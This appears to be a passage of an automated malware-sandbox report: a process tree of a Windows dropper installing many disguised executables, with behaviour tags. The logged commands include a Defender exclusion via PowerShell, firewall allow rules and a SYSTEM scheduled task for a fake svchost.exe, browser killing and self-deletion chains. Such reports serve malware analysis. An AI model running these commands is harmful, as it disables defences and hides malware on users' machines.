                                                              • Executes dropped EXE
                                                              PID:4924
                                                          • C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:1228
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\6OMebL7JbPas8BcXIUNnfFcX.exe" & del C:\ProgramData\*.dll & exit
                                                              3⤵
                                                                PID:4636
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im 6OMebL7JbPas8BcXIUNnfFcX.exe /f
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:5772
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 6
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4936
                                                            • C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\IU5rmCoRAx2aHgjhPh2xdpHv.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:2184
                                                            • C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\W1bYeEIYUUPaZDtUMFaYTrWG.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1892
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                3⤵
                                                                  PID:4484
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    4⤵
                                                                    • Kills process with taskkill
                                                                    PID:5076
                                                              • C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:3960
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe" & del C:\ProgramData\*.dll & exit
                                                                  3⤵
                                                                    PID:5060
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:5800
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      4⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:1812
                                                                • C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:3724
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 660
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:4376
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 696
                                                                    3⤵
                                                                    • Program crash
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4980
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 648
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:4676
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 712
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:1048
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1136
                                                                    3⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Program crash
                                                                    PID:4548
                                                                • C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3532
                                                                  • C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:588
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 876
                                                                      4⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Program crash
                                                                      PID:1012
                                                                • C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:1952
                                                                • C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:680
                                                                  • C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:4588
                                                                • C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:2732
                                                                • C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:1632
                                                                • C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1784
                                                                  • C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:6084
                                                                • C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Windows directory
                                                                  PID:3608
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                    3⤵
                                                                      PID:4476
                                                                    • C:\Windows\System32\netsh.exe
                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                      3⤵
                                                                        PID:4640
                                                                      • C:\Windows\System32\netsh.exe
                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                        3⤵
                                                                          PID:4660
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5760
                                                                        • C:\Windows\System\svchost.exe
                                                                          "C:\Windows\System\svchost.exe" formal
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Drops file in Windows directory
                                                                          PID:6028
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                            4⤵
                                                                              PID:5020
                                                                            • C:\Windows\System32\netsh.exe
                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                              4⤵
                                                                                PID:5768
                                                                              • C:\Windows\System32\netsh.exe
                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                4⤵
                                                                                  PID:1916
                                                                            • C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe"
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:4200
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:1160
                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                  4⤵
                                                                                    PID:6540
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x19c,0x1e8,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee0
                                                                                      5⤵
                                                                                        PID:3192
                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:1
                                                                                        5⤵
                                                                                          PID:3516
                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                          5⤵
                                                                                            PID:5800
                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2016 /prefetch:8
                                                                                            5⤵
                                                                                              PID:6808
                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2004 /prefetch:8
                                                                                              5⤵
                                                                                                PID:6228
                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1928 /prefetch:2
                                                                                                5⤵
                                                                                                  PID:4964
                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                  5⤵
                                                                                                    PID:7764
                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1928 /prefetch:2
                                                                                                    5⤵
                                                                                                      PID:7956
                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3312 /prefetch:8
                                                                                                      5⤵
                                                                                                        PID:7956
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                        5⤵
                                                                                                          PID:5044
                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1820 /prefetch:8
                                                                                                          5⤵
                                                                                                            PID:7036
                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2900 /prefetch:8
                                                                                                            5⤵
                                                                                                              PID:7500
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2224
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp" /SL5="$7003A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks whether UAC is enabled
                                                                                                      PID:4212
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe" /S /UID=2710
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4148
                                                                                                        • C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe" /VERYSILENT
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5220
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5776
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          PID:5012
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
                                                                                                            4⤵
                                                                                                              PID:4464
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet
                                                                                                                5⤵
                                                                                                                  PID:6580
                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
                                                                                                                    6⤵
                                                                                                                      PID:7776
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive & exit
                                                                                                                  4⤵
                                                                                                                    PID:916
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive
                                                                                                                      5⤵
                                                                                                                        PID:6560
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                      4⤵
                                                                                                                        PID:3268
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654"
                                                                                                                          5⤵
                                                                                                                            PID:6780
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe & exit
                                                                                                                          4⤵
                                                                                                                            PID:6352
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe
                                                                                                                              5⤵
                                                                                                                                PID:6188
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe & exit
                                                                                                                              4⤵
                                                                                                                                PID:6452
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe
                                                                                                                                  5⤵
                                                                                                                                    PID:4632
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive & exit
                                                                                                                                  4⤵
                                                                                                                                    PID:6652
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive
                                                                                                                                      5⤵
                                                                                                                                        PID:6848
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 888
                                                                                                                                          6⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:4216
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 804
                                                                                                                                          6⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:8028
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent & exit
                                                                                                                                      4⤵
                                                                                                                                        PID:7008
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent
                                                                                                                                          5⤵
                                                                                                                                            PID:6040
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp" /SL5="$10506,138429,56832,C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe" /verysilent
                                                                                                                                              6⤵
                                                                                                                                                PID:1252
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe" /Verysilent
                                                                                                                                                  7⤵
                                                                                                                                                    PID:7488
                                                                                                                                                    • C:\Program Files (x86)\FastPc\FastPc\Fast.exe
                                                                                                                                                      "C:\Program Files (x86)\FastPc\FastPc\Fast.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7656
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im Fast.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\FastPc\FastPc\Fast.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                          9⤵
                                                                                                                                                            PID:6632
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /im Fast.exe /f
                                                                                                                                                              10⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:7096
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /t 6
                                                                                                                                                              10⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:8816
                                                                                                                                                        • C:\Program Files (x86)\FastPc\FastPc\Fast_.exe
                                                                                                                                                          "C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:7524
                                                                                                                                                          • C:\Program Files (x86)\FastPc\FastPc\Faster.exe
                                                                                                                                                            "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:7220
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:4568
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6328
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp" /SL5="$601B0,17039402,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:4564
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:2036
